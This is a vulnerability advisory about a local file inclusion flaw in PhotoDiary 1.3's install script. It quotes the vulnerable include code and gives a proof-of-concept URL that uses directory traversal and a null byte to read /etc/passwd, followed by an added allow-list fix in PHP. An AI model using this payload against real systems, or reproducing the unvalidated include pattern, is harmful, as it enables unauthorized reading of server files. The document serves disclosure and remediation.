# Title : PhotoDiary 1.3 (lng) LFI Vulnerability
# Published : 2009-12-31
# Author : cOndemned


PhotoDiary 1.3 (lng) Local File Inclusion Vulnerability
Discovered by cOndemned

download: http://code.google.com/p/photodiary/


source of /admin/install.php (lines 9 - 15):

	if (isset($_GET['lng'])){
		$LNG = $_GET['lng'];			# 1: taken from the query string without validation
	} else {
		$LNG = "ITA";
	}
	
	include "../common/language_".$LNG.".php";	# 2: $LNG is concatenated into the include path


proof of concept:
		
	http://[target_host]/admin/install.php?lng=/../../../../../../etc/passwd%00
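
Added example (not part of the original advisory or PhotoDiary's code): the language selection from install.php rewritten with an allow-list, so the lng value never reaches the include path. The ENG code, the constant and function names, and the location of common/ relative to __DIR__ are assumptions.

```php
<?php
// Added example: allow-list replacement for the language selection in
// /admin/install.php. Only "ITA" appears in the advisory; "ENG" is an
// assumed second language code used for illustration.

const DEFAULT_LNG = 'ITA';
const ALLOWED_LNG = ['ITA', 'ENG'];   // assumption: match the files shipped in common/

/**
 * Map the untrusted ?lng= value to a language code from the allow-list.
 * Anything else (traversal sequences, NUL bytes, arrays, unknown codes)
 * falls back to the default, so user input never reaches the include path.
 */
function resolve_language($raw): string
{
    if (!is_string($raw)) {           // ?lng[]=x arrives as an array
        return DEFAULT_LNG;
    }
    // Strict comparison against known codes; the input is never normalised.
    return in_array($raw, ALLOWED_LNG, true) ? $raw : DEFAULT_LNG;
}

/**
 * Build the include path from the validated code and confirm it resolves
 * to a file directly inside the common/ directory before it is used.
 */
function language_file(string $lng, string $commonDir): ?string
{
    $base = realpath($commonDir);
    $path = realpath($commonDir . '/language_' . $lng . '.php');
    if ($base === false || $path === false) {
        return null;                  // directory or language file missing
    }
    // Defence in depth: the resolved file must sit directly under common/.
    return dirname($path) === $base ? $path : null;
}

$LNG  = resolve_language($_GET['lng'] ?? null);
$file = language_file($LNG, __DIR__ . '/../common');
if ($file === null) {
    http_response_code(500);
    exit('Language file not found.');
}
include $file;
```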